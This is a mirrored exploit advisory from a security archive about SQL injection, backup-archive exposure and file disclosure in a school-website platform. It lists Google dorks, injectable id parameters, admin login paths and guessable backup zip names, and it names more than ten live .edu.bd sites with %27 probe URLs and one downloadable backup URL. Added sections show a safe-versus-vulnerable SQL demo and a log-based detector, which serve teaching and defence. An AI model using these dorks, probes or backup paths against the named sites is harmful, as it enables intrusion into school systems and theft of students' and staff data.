RedGreenBD IT Solutions SQL Injection - Backup and File Disclosure

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019010038

Below is a copy:

RedGreenBD IT Solutions SQL Injection - Backup and File Disclosure
###################################################################

# Exploit Title : RedGreenBD IT Solutions SQL Injection - Backup and File Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 05/01/2019
# Vendor Homepage : redgreenbd.com
# Vendor Version : PHP 5.4.45 - LiteSpeed Server - jQuery 1.3.2 (observed server stack, not a product version)
# Software Download Link : N/A
# Software : Commercial (pricing at redgreenbd.com/pd.php)
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : intext:"Design & Developed by : RedGreenBD IT Solutions"
                intext:"Designed by RedGreenBD IT Solutions"
                intext:"Developed by RedGreenBD ITS"
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
                       CWE-200 [ Information Exposure ]
                       CWE-538 [ File and Directory Information Exposure ]
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-redgreenbd-it-solutions-multiple-vulnerabilities.html

###################################################################

# Admin Panel Login Path / Student-Teacher-Guardian Panel Path =>
***********************************************************

/index.php?q=login-form
/?q=login
/?q=student-login
/wadmin

# SQL Injection Exploit :
**********************

/?q=newsDetail&id=[SQL Injection]

/?q=news-detail&id=[SQL Injection]

/?q=notice-detail&id=[SQL Injection]

/?q=page-detail&id=[SQL Injection]

/?q=home-block&id=[SQL Injection]

/index.php?q=news-detail&id=[SQL Injection]
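Added example (not part of the original advisory): the injectable pattern that the quoted MariaDB error points to, modelled in Python with an in-memory sqlite3 table standing in for the PHP/MariaDB news table, beside the validate-and-bind form that closes the hole. The table name, columns and rows are assumptions constructed for the demo, not the vendor's schema.

```python
import sqlite3

# Constructed stand-in for the application's news table (names and rows
# are assumptions for the demo, not taken from the vendor's schema).
SAMPLE_ROWS = [
    (12, "Exam routine published"),
    (13, "Admission notice"),
    (14, "Staff meeting minutes"),
]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    con.executemany("INSERT INTO news VALUES (?, ?)", SAMPLE_ROWS)
    return con


def news_detail_vulnerable(con, id_param):
    """CWE-89 pattern: the raw id parameter is concatenated into the SQL text.
    A trailing quote (id=13') unbalances the statement and the database
    reports a syntax error, which is exactly what the %27 probe relies on."""
    sql = "SELECT id, title FROM news WHERE id=" + id_param
    return con.execute(sql).fetchall()


def news_detail_fixed(con, id_param):
    """Hardened form: reject anything that is not a plain integer, then bind
    the value as a parameter so it can never change the statement structure."""
    if not id_param.isdigit():
        raise ValueError("id must be a positive integer")
    return con.execute(
        "SELECT id, title FROM news WHERE id=?", (int(id_param),)
    ).fetchall()


def run_demo():
    """Feed the same inputs to both handlers and return what happened.
    Values are row counts, or a string describing the error/rejection."""
    con = make_db()
    outcome = {}
    for payload in ("13", "13'", "13 OR 1=1"):
        try:
            outcome[("vulnerable", payload)] = len(news_detail_vulnerable(con, payload))
        except sqlite3.OperationalError as exc:
            # sqlite wording differs from MariaDB's "You have an error in your
            # SQL syntax", but it is the same unbalanced-quote failure.
            outcome[("vulnerable", payload)] = "syntax error: " + str(exc)
        try:
            outcome[("fixed", payload)] = len(news_detail_fixed(con, payload))
        except ValueError:
            outcome[("fixed", payload)] = "rejected"
    return outcome


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, "->", value)
```

With the concatenating handler, id=13 returns one row, id=13' raises the syntax error seen in the advisory, and id=13 OR 1=1 returns every row; the bound version answers the first and refuses the other two before any SQL runs.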

# Backup Disclosure Exploit [ Example ] => 
***************************************

Date-stamped backup archives of the upload directory are left inside the web-accessible /uploads/ folder and can be downloaded without authentication. The name pattern is day_month_year (two-digit year in the observed files), so an archive can be located by guessing dates:

/uploads/uploads_backup_[DAY]_[MONTH]_[YEAR].zip

/uploads/uploads_backup_18_12_18.zip

/uploads/uploads_backup_21_11_18.zip

# Arbitrary File Disclosure => 
**************************

Uploaded documents are served straight from the web root, so the files in the following subfolders can be fetched by URL without logging in:

/uploads/....

/uploads/booklist/ => PDF Files here
/uploads/mnews/ => PDF Files here
/uploads/result/ => PDF Files here
/uploads/routine3/ => PDF Files here
/uploads/syllabus/ => PDF Files here
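Added example (not the advisory's code): a detection pass over web-server access logs for the indicators above, flagging non-numeric id values on the listed q= handlers (the %27 probe) and fetches of the date-stamped backup archive. The log lines are constructed for the demo, the client addresses are RFC 5737 documentation addresses, and the syllabus PDF name is made up.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Handlers the advisory lists as injectable through the id parameter.
INJECTABLE_HANDLERS = {"newsDetail", "news-detail", "notice-detail", "page-detail", "home-block"}

# Date-stamped backup archive in the web root; day/month padding is not
# known from the advisory, so one or two digits are accepted for each field.
BACKUP_RE = re.compile(r"^/uploads/uploads_backup_\d{1,2}_\d{1,2}_\d{2,4}\.zip$", re.IGNORECASE)

# Common/combined log format, as written by most web servers.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def classify_request(target):
    """Return indicator names for one request target (path plus query)."""
    hits = []
    parts = urlsplit(target)
    if BACKUP_RE.match(unquote(parts.path)):
        hits.append("backup-archive-fetch")
    query = parse_qs(parts.query, keep_blank_values=True)  # decodes %27 and '+'
    handler = query.get("q", [""])[0]
    if handler in INJECTABLE_HANDLERS:
        # A legitimate id is a bare integer; anything else (13', 1 OR 1=1, ...)
        # is a probe of the injection point.
        if any(not value.isdigit() for value in query.get("id", [])):
            hits.append("sqli-probe:" + handler)
    return hits


def scan_log(lines):
    """Return a list of (client, target, status, indicators) for suspicious requests."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        hits = classify_request(match.group("target"))
        if hits:
            findings.append((match.group("ip"), match.group("target"), match.group("status"), hits))
    return findings


# Constructed sample log (RFC 5737 documentation addresses; the syllabus
# file name is made up). The first line is a normal visit and must not match.
SAMPLE_LOG = """\
198.51.100.7 - - [05/Jan/2019:10:12:01 +0600] "GET /?q=newsDetail&id=13 HTTP/1.1" 200 5120
198.51.100.7 - - [05/Jan/2019:10:12:03 +0600] "GET /?q=newsDetail&id=13%27 HTTP/1.1" 200 812
203.0.113.9 - - [05/Jan/2019:10:15:44 +0600] "GET /uploads/uploads_backup_21_11_18.zip HTTP/1.1" 200 73400320
203.0.113.9 - - [05/Jan/2019:10:16:02 +0600] "GET /uploads/syllabus/class9.pdf HTTP/1.1" 200 20480
198.51.100.7 - - [05/Jan/2019:10:17:30 +0600] "GET /index.php?q=news-detail&id=1+OR+1%3D1 HTTP/1.1" 200 9100
"""


if __name__ == "__main__":
    for client, target, status, hits in scan_log(SAMPLE_LOG.splitlines()):
        print(client, status, ",".join(hits), target)
```

Run against a real log the same way (scan_log(open(path))). A 200 with a small body right after the %27 request is the error page the advisory quotes; a 200 with a multi-megabyte body on the backup path means the archive has already left the server.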

###################################################################

# Example Vulnerable Sites =>

Note => The affected deployments are Bangladeshi education (.edu.bd) sites built on this vendor's platform.

(104.152.168.23) => 899 domains are hosted on this shared server.

[+] dhankhalimuss.edu.bd/?q=newsDetail&id=13%27

+ Proof of Concept for SQL Injection (archived response) => archive.vn/EJDgW

[+] cmpi.edu.bd/?q=newsDetail&id=13%27

[+] panchjuniadss.edu.bd/?q=newsDetail&id=13%27

[+] ths.edu.bd/?q=newsDetail&id=13%27

[+] rmss.edu.bd/?q=newsDetail&id=13%27

[+] pakhimarapvss.edu.bd/?q=notice-detail&id=3%27

[+] tsbghs.edu.bd/?q=page-detail&id=3%27

[+] nipi.edu.bd/?q=newsDetail&id=13%27

[+] cppi.edu.bd/?q=newsDetail&id=13%27

[+] bsidhaka.edu.bd/?q=newsDetail&id=13%27

[+] bsidhaka.edu.bd/uploads/uploads_backup_21_11_18.zip

###################################################################

# SQL Database Error : 

The appended single quote (%27) is passed unescaped into the query, and the MariaDB error is echoed back to the page:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''13''' at line 1

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################
